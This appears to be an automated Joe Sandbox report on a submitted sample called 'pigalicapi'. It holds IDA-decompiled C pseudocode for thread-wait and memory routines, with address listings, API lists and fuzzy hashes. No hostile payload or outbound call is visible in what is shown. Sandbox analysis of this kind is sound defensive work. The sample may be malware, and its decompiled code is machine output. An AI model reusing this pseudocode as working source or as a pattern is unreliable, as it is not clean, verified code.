                                                                                                                                                                                                                                                                                                        								goto L59;
                                                                                                                                                                                                                                                                                                        							}
                                                                                                                                                                                                                                                                                                        							_t76 = 1;
                                                                                                                                                                                                                                                                                                        							goto L55;
                                                                                                                                                                                                                                                                                                        						} else {
                                                                                                                                                                                                                                                                                                        							_t86 = 0x14;
                                                                                                                                                                                                                                                                                                        							_v48 = WaitForSingleObject;
                                                                                                                                                                                                                                                                                                        							do {
                                                                                                                                                                                                                                                                                                        								__eflags = _t86 - _t75;
                                                                                                                                                                                                                                                                                                        								_t86 =  >  ? _t75 : _t86;
                                                                                                                                                                                                                                                                                                        								_v72 = _t86;
                                                                                                                                                                                                                                                                                                        								 *_t90 = _t87;
                                                                                                                                                                                                                                                                                                        								_t61 = _v48();
                                                                                                                                                                                                                                                                                                        								_t90 = _t90 - 8;
                                                                                                                                                                                                                                                                                                        								__eflags = _t61 - 0x80;
                                                                                                                                                                                                                                                                                                        								if(_t61 == 0x80) {
                                                                                                                                                                                                                                                                                                        									_t79 = 1;
                                                                                                                                                                                                                                                                                                        									goto L30;
                                                                                                                                                                                                                                                                                                        								} else {
                                                                                                                                                                                                                                                                                                        									__eflags = _t61 - 0x102;
                                                                                                                                                                                                                                                                                                        									if(_t61 == 0x102) {
                                                                                                                                                                                                                                                                                                        										_t79 = 0x8a;
                                                                                                                                                                                                                                                                                                        										goto L30;
                                                                                                                                                                                                                                                                                                        									} else {
                                                                                                                                                                                                                                                                                                        										__eflags = _t61;
                                                                                                                                                                                                                                                                                                        										if(_t61 == 0) {
                                                                                                                                                                                                                                                                                                        											_t79 = 0;
                                                                                                                                                                                                                                                                                                        											__eflags = 0;
                                                                                                                                                                                                                                                                                                        											goto L40;
                                                                                                                                                                                                                                                                                                        										} else {
                                                                                                                                                                                                                                                                                                        											_t79 = 0x16;
                                                                                                                                                                                                                                                                                                        											L30:
                                                                                                                                                                                                                                                                                                        											_t75 = _t75 - _t86;
                                                                                                                                                                                                                                                                                                        											__eflags = _t75;
                                                                                                                                                                                                                                                                                                        											if(_t75 != 0) {
                                                                                                                                                                                                                                                                                                        												_v52 = _t79;
                                                                                                                                                                                                                                                                                                        												_t62 = E00412070(_t75, _t79, _t82, _t86, _t87, _t88);
                                                                                                                                                                                                                                                                                                        												_t80 = _v52;
                                                                                                                                                                                                                                                                                                        												__eflags = _t62;
                                                                                                                                                                                                                                                                                                        												if(_t62 != 0) {
                                                                                                                                                                                                                                                                                                        													goto L17;
                                                                                                                                                                                                                                                                                                        												} else {
                                                                                                                                                                                                                                                                                                        													goto L37;
                                                                                                                                                                                                                                                                                                        												}
                                                                                                                                                                                                                                                                                                        											} else {
                                                                                                                                                                                                                                                                                                        												L31:
                                                                                                                                                                                                                                                                                                        												__eflags = _t79 - 0x8a;
                                                                                                                                                                                                                                                                                                        												if(_t79 != 0x8a) {
                                                                                                                                                                                                                                                                                                        													L40:
                                                                                                                                                                                                                                                                                                        													__eflags = _t79;
                                                                                                                                                                                                                                                                                                        													if(_t79 != 0) {
                                                                                                                                                                                                                                                                                                        														goto L33;
                                                                                                                                                                                                                                                                                                        													} else {
                                                                                                                                                                                                                                                                                                        														_t64 = _t79;
                                                                                                                                                                                                                                                                                                        														goto L35;
                                                                                                                                                                                                                                                                                                        													}
                                                                                                                                                                                                                                                                                                        												} else {
                                                                                                                                                                                                                                                                                                        													_v52 = _t79;
                                                                                                                                                                                                                                                                                                        													_v80 = 0;
                                                                                                                                                                                                                                                                                                        													 *_t90 = _t87;
                                                                                                                                                                                                                                                                                                        													_t65 = _v48();
                                                                                                                                                                                                                                                                                                        													_t79 = _v52;
                                                                                                                                                                                                                                                                                                        													__eflags = _t65;
                                                                                                                                                                                                                                                                                                        													if(_t65 == 0) {
                                                                                                                                                                                                                                                                                                        														goto L20;
                                                                                                                                                                                                                                                                                                        													} else {
                                                                                                                                                                                                                                                                                                        														L33:
                                                                                                                                                                                                                                                                                                        														__eflags = _a8 - 2;
                                                                                                                                                                                                                                                                                                        														if(_a8 != 2) {
                                                                                                                                                                                                                                                                                                        															_v48 = _t79;
                                                                                                                                                                                                                                                                                                        															E00412210();
                                                                                                                                                                                                                                                                                                        															_t51 = _v48;
                                                                                                                                                                                                                                                                                                        															goto L15;
                                                                                                                                                                                                                                                                                                        														} else {
                                                                                                                                                                                                                                                                                                        															_t64 = _t79;
                                                                                                                                                                                                                                                                                                        															L35:
                                                                                                                                                                                                                                                                                                        															return _t64;
                                                                                                                                                                                                                                                                                                        														}
                                                                                                                                                                                                                                                                                                        													}
                                                                                                                                                                                                                                                                                                        												}
                                                                                                                                                                                                                                                                                                        											}
                                                                                                                                                                                                                                                                                                        										}
                                                                                                                                                                                                                                                                                                        									}
                                                                                                                                                                                                                                                                                                        								}
                                                                                                                                                                                                                                                                                                        								goto L59;
                                                                                                                                                                                                                                                                                                        								L37:
                                                                                                                                                                                                                                                                                                        								__eflags = _t80 - 0x8a;
                                                                                                                                                                                                                                                                                                        							} while (_t80 == 0x8a);
                                                                                                                                                                                                                                                                                                        							goto L31;
                                                                                                                                                                                                                                                                                                        						}
                                                                                                                                                                                                                                                                                                        					} else {
                                                                                                                                                                                                                                                                                                        						while(1) {
                                                                                                                                                                                                                                                                                                        							_v64 = _t75;
                                                                                                                                                                                                                                                                                                        							_v68 = 0;
                                                                                                                                                                                                                                                                                                        							_v72 =  &_v36;
                                                                                                                                                                                                                                                                                                        							 *_t90 = 2;
                                                                                                                                                                                                                                                                                                        							_t67 = WaitForMultipleObjects(??, ??, ??, ??);
                                                                                                                                                                                                                                                                                                        							_t99 = _t90 - 0x10;
                                                                                                                                                                                                                                                                                                        							_t103 = _t67 - 1;
                                                                                                                                                                                                                                                                                                        							if(_t103 != 0) {
                                                                                                                                                                                                                                                                                                        								break;
                                                                                                                                                                                                                                                                                                        							}
                                                                                                                                                                                                                                                                                                        							 *_t99 = _v32;
                                                                                                                                                                                                                                                                                                        							ResetEvent(??);
                                                                                                                                                                                                                                                                                                        							_t90 = _t99 - 4;
                                                                                                                                                                                                                                                                                                        							__eflags = _a8 - 2;
                                                                                                                                                                                                                                                                                                        							if(_a8 != 2) {
                                                                                                                                                                                                                                                                                                        								L50:
                                                                                                                                                                                                                                                                                                        								E00412210();
                                                                                                                                                                                                                                                                                                        								_t51 = 0x16;
                                                                                                                                                                                                                                                                                                        								L15:
                                                                                                                                                                                                                                                                                                        								return _t51;
                                                                                                                                                                                                                                                                                                        							} else {
                                                                                                                                                                                                                                                                                                        								E00412210();
                                                                                                                                                                                                                                                                                                        								continue;
                                                                                                                                                                                                                                                                                                        							}
                                                                                                                                                                                                                                                                                                        							goto L59;
                                                                                                                                                                                                                                                                                                        						}
                                                                                                                                                                                                                                                                                                        						if(_t103 < 0) {
                                                                                                                                                                                                                                                                                                        							_t48 = 0;
                                                                                                                                                                                                                                                                                                        							goto L11;
                                                                                                                                                                                                                                                                                                        						} else {
                                                                                                                                                                                                                                                                                                        							if(_t67 == 0x80) {
                                                                                                                                                                                                                                                                                                        								_t76 = 1;
                                                                                                                                                                                                                                                                                                        								goto L7;
                                                                                                                                                                                                                                                                                                        							} else {
                                                                                                                                                                                                                                                                                                        								if(_t67 != 0x102) {
                                                                                                                                                                                                                                                                                                        									__eflags = _a8 - 2;
                                                                                                                                                                                                                                                                                                        									_t76 = 0x16;
                                                                                                                                                                                                                                                                                                        									_t73 = _t67 & 0xffffff00 | _a8 != 0x00000002;
                                                                                                                                                                                                                                                                                                        									goto L9;
                                                                                                                                                                                                                                                                                                        								} else {
                                                                                                                                                                                                                                                                                                        									_t76 = 0x8a;
                                                                                                                                                                                                                                                                                                        									L7:
                                                                                                                                                                                                                                                                                                        									_v72 = 0;
                                                                                                                                                                                                                                                                                                        									 *_t99 = _v36;
                                                                                                                                                                                                                                                                                                        									_t72 = WaitForSingleObject(??, ??);
                                                                                                                                                                                                                                                                                                        									if(_t72 == 0) {
                                                                                                                                                                                                                                                                                                        										L20:
                                                                                                                                                                                                                                                                                                        										__eflags = 0;
                                                                                                                                                                                                                                                                                                        										return 0;
                                                                                                                                                                                                                                                                                                        									} else {
                                                                                                                                                                                                                                                                                                        										_t73 = _t72 & 0xffffff00 | _a8 != 0x00000002;
                                                                                                                                                                                                                                                                                                        										L9:
                                                                                                                                                                                                                                                                                                        										if(_t73 != 0) {
                                                                                                                                                                                                                                                                                                        											_t74 = E00412070(_t76, _t78, _t82, _t85, _t87, _t88);
                                                                                                                                                                                                                                                                                                        											_t51 = _t76;
                                                                                                                                                                                                                                                                                                        											__eflags = _t74;
                                                                                                                                                                                                                                                                                                        											if(_t74 == 0) {
                                                                                                                                                                                                                                                                                                        												goto L15;
                                                                                                                                                                                                                                                                                                        											} else {
                                                                                                                                                                                                                                                                                                        												L17:
                                                                                                                                                                                                                                                                                                        												return 0x16;
                                                                                                                                                                                                                                                                                                        											}
                                                                                                                                                                                                                                                                                                        										} else {
                                                                                                                                                                                                                                                                                                        											L10:
                                                                                                                                                                                                                                                                                                        											_t48 = _t76;
                                                                                                                                                                                                                                                                                                        											L11:
                                                                                                                                                                                                                                                                                                        											return _t48;
                                                                                                                                                                                                                                                                                                        										}
                                                                                                                                                                                                                                                                                                        									}
                                                                                                                                                                                                                                                                                                        								}
                                                                                                                                                                                                                                                                                                        							}
                                                                                                                                                                                                                                                                                                        						}
                                                                                                                                                                                                                                                                                                        					}
                                                                                                                                                                                                                                                                                                        				}
                                                                                                                                                                                                                                                                                                        				L59:
                                                                                                                                                                                                                                                                                                        			}
















































                                                                                                                                                                                                                                                                                                        0x00416290
                                                                                                                                                                                                                                                                                                        0x00416290
                                                                                                                                                                                                                                                                                                        0x00416296
                                                                                                                                                                                                                                                                                                        0x00416299
                                                                                                                                                                                                                                                                                                        0x0041629c
                                                                                                                                                                                                                                                                                                        0x004162a0
                                                                                                                                                                                                                                                                                                        0x004162a3
                                                                                                                                                                                                                                                                                                        0x0041634a
                                                                                                                                                                                                                                                                                                        0x0041634e
                                                                                                                                                                                                                                                                                                        0x00416351
                                                                                                                                                                                                                                                                                                        0x00416354
                                                                                                                                                                                                                                                                                                        0x00416356
                                                                                                                                                                                                                                                                                                        0x00416359
                                                                                                                                                                                                                                                                                                        0x0041635e
                                                                                                                                                                                                                                                                                                        0x004164e0
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x00416364
                                                                                                                                                                                                                                                                                                        0x00416364
                                                                                                                                                                                                                                                                                                        0x00416369
                                                                                                                                                                                                                                                                                                        0x004163a0
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x0041636b
                                                                                                                                                                                                                                                                                                        0x0041636b
                                                                                                                                                                                                                                                                                                        0x0041636e
                                                                                                                                                                                                                                                                                                        0x00416372
                                                                                                                                                                                                                                                                                                        0x00416372
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x00416372
                                                                                                                                                                                                                                                                                                        0x00416369
                                                                                                                                                                                                                                                                                                        0x004162a9
                                                                                                                                                                                                                                                                                                        0x004162a9
                                                                                                                                                                                                                                                                                                        0x004162b1
                                                                                                                                                                                                                                                                                                        0x004162b4
                                                                                                                                                                                                                                                                                                        0x004162bb
                                                                                                                                                                                                                                                                                                        0x004162be
                                                                                                                                                                                                                                                                                                        0x004163f0
                                                                                                                                                                                                                                                                                                        0x004163f3
                                                                                                                                                                                                                                                                                                        0x0041652c
                                                                                                                                                                                                                                                                                                        0x00416530
                                                                                                                                                                                                                                                                                                        0x00416530
                                                                                                                                                                                                                                                                                                        0x00416538
                                                                                                                                                                                                                                                                                                        0x0041653b
                                                                                                                                                                                                                                                                                                        0x0041653e
                                                                                                                                                                                                                                                                                                        0x00416541
                                                                                                                                                                                                                                                                                                        0x00416546
                                                                                                                                                                                                                                                                                                        0x00416548
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x0041654a
                                                                                                                                                                                                                                                                                                        0x0041654f
                                                                                                                                                                                                                                                                                                        0x00416505
                                                                                                                                                                                                                                                                                                        0x0041650a
                                                                                                                                                                                                                                                                                                        0x0041650c
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x00416551
                                                                                                                                                                                                                                                                                                        0x00416551
                                                                                                                                                                                                                                                                                                        0x00416553
                                                                                                                                                                                                                                                                                                        0x00416555
                                                                                                                                                                                                                                                                                                        0x0041655a
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x00416560
                                                                                                                                                                                                                                                                                                        0x00416560
                                                                                                                                                                                                                                                                                                        0x00416560
                                                                                                                                                                                                                                                                                                        0x00416565
                                                                                                                                                                                                                                                                                                        0x00416567
                                                                                                                                                                                                                                                                                                        0x0041650e
                                                                                                                                                                                                                                                                                                        0x0041650e
                                                                                                                                                                                                                                                                                                        0x00416512
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x00416569
                                                                                                                                                                                                                                                                                                        0x00416569
                                                                                                                                                                                                                                                                                                        0x0041656c
                                                                                                                                                                                                                                                                                                        0x00416571
                                                                                                                                                                                                                                                                                                        0x004163a5
                                                                                                                                                                                                                                                                                                        0x004163a5
                                                                                                                                                                                                                                                                                                        0x004163ad
                                                                                                                                                                                                                                                                                                        0x004163b0
                                                                                                                                                                                                                                                                                                        0x004163b6
                                                                                                                                                                                                                                                                                                        0x004163b8
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x00416577
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x00416577
                                                                                                                                                                                                                                                                                                        0x00416571
                                                                                                                                                                                                                                                                                                        0x00416567
                                                                                                                                                                                                                                                                                                        0x0041655a
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x0041654f
                                                                                                                                                                                                                                                                                                        0x00416580
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x004163f9
                                                                                                                                                                                                                                                                                                        0x004163fe
                                                                                                                                                                                                                                                                                                        0x00416403
                                                                                                                                                                                                                                                                                                        0x00416406
                                                                                                                                                                                                                                                                                                        0x00416406
                                                                                                                                                                                                                                                                                                        0x00416408
                                                                                                                                                                                                                                                                                                        0x0041640b
                                                                                                                                                                                                                                                                                                        0x0041640f
                                                                                                                                                                                                                                                                                                        0x00416412
                                                                                                                                                                                                                                                                                                        0x00416415
                                                                                                                                                                                                                                                                                                        0x00416418
                                                                                                                                                                                                                                                                                                        0x0041641d
                                                                                                                                                                                                                                                                                                        0x004164d0
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x00416423
                                                                                                                                                                                                                                                                                                        0x00416423
                                                                                                                                                                                                                                                                                                        0x00416428
                                                                                                                                                                                                                                                                                                        0x004164c0
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x0041642e
                                                                                                                                                                                                                                                                                                        0x0041642e
                                                                                                                                                                                                                                                                                                        0x00416430
                                                                                                                                                                                                                                                                                                        0x004164a0
                                                                                                                                                                                                                                                                                                        0x004164a0
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x00416432
                                                                                                                                                                                                                                                                                                        0x00416432
                                                                                                                                                                                                                                                                                                        0x00416437
                                                                                                                                                                                                                                                                                                        0x00416437
                                                                                                                                                                                                                                                                                                        0x00416437
                                                                                                                                                                                                                                                                                                        0x00416439
                                                                                                                                                                                                                                                                                                        0x00416478
                                                                                                                                                                                                                                                                                                        0x0041647b
                                                                                                                                                                                                                                                                                                        0x00416480
                                                                                                                                                                                                                                                                                                        0x00416483
                                                                                                                                                                                                                                                                                                        0x00416485
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x0041643b
                                                                                                                                                                                                                                                                                                        0x0041643b
                                                                                                                                                                                                                                                                                                        0x0041643b
                                                                                                                                                                                                                                                                                                        0x00416441
                                                                                                                                                                                                                                                                                                        0x004164a2
                                                                                                                                                                                                                                                                                                        0x004164a2
                                                                                                                                                                                                                                                                                                        0x004164a4
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x004164a6
                                                                                                                                                                                                                                                                                                        0x004164a6
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x004164a6
                                                                                                                                                                                                                                                                                                        0x00416443
                                                                                                                                                                                                                                                                                                        0x00416443
                                                                                                                                                                                                                                                                                                        0x00416446
                                                                                                                                                                                                                                                                                                        0x0041644e
                                                                                                                                                                                                                                                                                                        0x00416451
                                                                                                                                                                                                                                                                                                        0x00416454
                                                                                                                                                                                                                                                                                                        0x0041645a
                                                                                                                                                                                                                                                                                                        0x0041645c
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x00416462
                                                                                                                                                                                                                                                                                                        0x00416462
                                                                                                                                                                                                                                                                                                        0x00416462
                                                                                                                                                                                                                                                                                                        0x00416466
                                                                                                                                                                                                                                                                                                        0x004164aa
                                                                                                                                                                                                                                                                                                        0x004164ad
                                                                                                                                                                                                                                                                                                        0x004164b5
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x00416468
                                                                                                                                                                                                                                                                                                        0x00416468
                                                                                                                                                                                                                                                                                                        0x00416470
                                                                                                                                                                                                                                                                                                        0x00416477
                                                                                                                                                                                                                                                                                                        0x00416477
                                                                                                                                                                                                                                                                                                        0x00416466
                                                                                                                                                                                                                                                                                                        0x0041645c
                                                                                                                                                                                                                                                                                                        0x00416441
                                                                                                                                                                                                                                                                                                        0x00416439
                                                                                                                                                                                                                                                                                                        0x00416430
                                                                                                                                                                                                                                                                                                        0x00416428
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x0041648b
                                                                                                                                                                                                                                                                                                        0x0041648b
                                                                                                                                                                                                                                                                                                        0x0041648b
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x00416497
                                                                                                                                                                                                                                                                                                        0x004162c4
                                                                                                                                                                                                                                                                                                        0x004162c4
                                                                                                                                                                                                                                                                                                        0x004162c7
                                                                                                                                                                                                                                                                                                        0x004162cb
                                                                                                                                                                                                                                                                                                        0x004162d3
                                                                                                                                                                                                                                                                                                        0x004162d7
                                                                                                                                                                                                                                                                                                        0x004162de
                                                                                                                                                                                                                                                                                                        0x004162e4
                                                                                                                                                                                                                                                                                                        0x004162e7
                                                                                                                                                                                                                                                                                                        0x004162ea
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x004163d0
                                                                                                                                                                                                                                                                                                        0x004163d3
                                                                                                                                                                                                                                                                                                        0x004163d9
                                                                                                                                                                                                                                                                                                        0x004163dc
                                                                                                                                                                                                                                                                                                        0x004163e0
                                                                                                                                                                                                                                                                                                        0x00416518
                                                                                                                                                                                                                                                                                                        0x00416518
                                                                                                                                                                                                                                                                                                        0x0041651d
                                                                                                                                                                                                                                                                                                        0x00416375
                                                                                                                                                                                                                                                                                                        0x0041637c
                                                                                                                                                                                                                                                                                                        0x004163e6
                                                                                                                                                                                                                                                                                                        0x004163e6
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x004163e6
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x004163e0
                                                                                                                                                                                                                                                                                                        0x004162f0
                                                                                                                                                                                                                                                                                                        0x004163c6
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x004162f6
                                                                                                                                                                                                                                                                                                        0x004162fb
                                                                                                                                                                                                                                                                                                        0x004164fb
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x00416301
                                                                                                                                                                                                                                                                                                        0x00416306
                                                                                                                                                                                                                                                                                                        0x004164ea
                                                                                                                                                                                                                                                                                                        0x004164ee
                                                                                                                                                                                                                                                                                                        0x004164f3
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x0041630c
                                                                                                                                                                                                                                                                                                        0x0041630c
                                                                                                                                                                                                                                                                                                        0x00416311
                                                                                                                                                                                                                                                                                                        0x00416314
                                                                                                                                                                                                                                                                                                        0x0041631c
                                                                                                                                                                                                                                                                                                        0x0041631f
                                                                                                                                                                                                                                                                                                        0x0041632a
                                                                                                                                                                                                                                                                                                        0x004163ba
                                                                                                                                                                                                                                                                                                        0x004163bd
                                                                                                                                                                                                                                                                                                        0x004163c3
                                                                                                                                                                                                                                                                                                        0x00416330
                                                                                                                                                                                                                                                                                                        0x00416334
                                                                                                                                                                                                                                                                                                        0x00416337
                                                                                                                                                                                                                                                                                                        0x00416339
                                                                                                                                                                                                                                                                                                        0x00416380
                                                                                                                                                                                                                                                                                                        0x00416387
                                                                                                                                                                                                                                                                                                        0x00416389
                                                                                                                                                                                                                                                                                                        0x0041638b
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x0041638d
                                                                                                                                                                                                                                                                                                        0x0041638d
                                                                                                                                                                                                                                                                                                        0x00416399
                                                                                                                                                                                                                                                                                                        0x00416399
                                                                                                                                                                                                                                                                                                        0x0041633b
                                                                                                                                                                                                                                                                                                        0x0041633b
                                                                                                                                                                                                                                                                                                        0x0041633b
                                                                                                                                                                                                                                                                                                        0x0041633d
                                                                                                                                                                                                                                                                                                        0x00416344
                                                                                                                                                                                                                                                                                                        0x00416344
                                                                                                                                                                                                                                                                                                        0x00416339
                                                                                                                                                                                                                                                                                                        0x0041632a
                                                                                                                                                                                                                                                                                                        0x00416306
                                                                                                                                                                                                                                                                                                        0x004162fb
                                                                                                                                                                                                                                                                                                        0x004162f0
                                                                                                                                                                                                                                                                                                        0x004162be
                                                                                                                                                                                                                                                                                                        0x00000000

                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • WaitForMultipleObjects.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00411205,FFFFFFFF,?,00413F5C), ref: 004162DE
                                                                                                                                                                                                                                                                                                        • WaitForSingleObject.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00411205), ref: 0041631F
                                                                                                                                                                                                                                                                                                        • ResetEvent.KERNEL32 ref: 004163D3
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000001.00000002.630678396.0000000000402000.00000080.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.630393868.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.630561595.0000000000401000.00000020.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.631400390.000000000041F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.631534886.0000000000422000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.631640213.0000000000423000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.631857089.000000000042B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.631957410.000000000042E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.632483760.0000000000444000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_400000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: Wait$EventMultipleObjectObjectsResetSingle
                                                                                                                                                                                                                                                                                                        • String ID: (
                                                                                                                                                                                                                                                                                                        • API String ID: 256776027-3887548279
                                                                                                                                                                                                                                                                                                        • Opcode ID: b4733ac531acf217bfbfdf5bd4e52257d9b599610da1baf24221a20e7f36d5fc
                                                                                                                                                                                                                                                                                                        • Instruction ID: 33d5a718a10795f4640d15a2a31863235bdb1fdf0ba6d8b48b186967bb3fffd1
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: b4733ac531acf217bfbfdf5bd4e52257d9b599610da1baf24221a20e7f36d5fc
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: A9618E71A042089BDF209FA9D5493EEB7A1EB44314F12853BEDA5D7380DB3DC885CB5A
                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000001.00000002.630678396.0000000000402000.00000080.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.630393868.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.630561595.0000000000401000.00000020.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.631400390.000000000041F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.631534886.0000000000422000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.631640213.0000000000423000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.631857089.000000000042B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.631957410.000000000042E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.632483760.0000000000444000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_400000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: freememcpystrlen
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 2208669145-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: b95072503d289b122270171115fbda5e346781793e070ee70b941499e8d717ba
                                                                                                                                                                                                                                                                                                        • Instruction ID: ef56fa0fe3e4a126f61911e2a387ce4b2f316110e497464169164f036395c722
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: b95072503d289b122270171115fbda5e346781793e070ee70b941499e8d717ba
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: F7312DB2208701CBC710AF69D4C072BBBE5EBD5364F140A3EE994A73D0D779D8458B9A
                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                        C-Code - Quality: 68%
                                                                                                                                                                                                                                                                                                        			E0040B820(signed char __eax, signed char* __ecx, signed char* __edx) {
                                                                                                                                                                                                                                                                                                        				signed char _t104;
                                                                                                                                                                                                                                                                                                        				void* _t107;
                                                                                                                                                                                                                                                                                                        				void* _t110;
                                                                                                                                                                                                                                                                                                        				signed char _t113;
                                                                                                                                                                                                                                                                                                        				intOrPtr _t117;
                                                                                                                                                                                                                                                                                                        				void* _t120;
                                                                                                                                                                                                                                                                                                        				signed char _t121;
                                                                                                                                                                                                                                                                                                        				int _t125;
                                                                                                                                                                                                                                                                                                        				signed char _t126;
                                                                                                                                                                                                                                                                                                        				signed char* _t137;
                                                                                                                                                                                                                                                                                                        				char* _t138;
                                                                                                                                                                                                                                                                                                        				signed char* _t139;
                                                                                                                                                                                                                                                                                                        				char* _t140;
                                                                                                                                                                                                                                                                                                        				signed int _t141;
                                                                                                                                                                                                                                                                                                        				signed char _t149;
                                                                                                                                                                                                                                                                                                        				signed char _t151;
                                                                                                                                                                                                                                                                                                        				signed int _t152;
                                                                                                                                                                                                                                                                                                        				signed char _t153;
                                                                                                                                                                                                                                                                                                        				signed char _t159;
                                                                                                                                                                                                                                                                                                        				signed int _t161;
                                                                                                                                                                                                                                                                                                        				signed int _t162;
                                                                                                                                                                                                                                                                                                        				signed char _t163;
                                                                                                                                                                                                                                                                                                        				signed char* _t167;
                                                                                                                                                                                                                                                                                                        				signed char* _t168;
                                                                                                                                                                                                                                                                                                        				signed char* _t169;
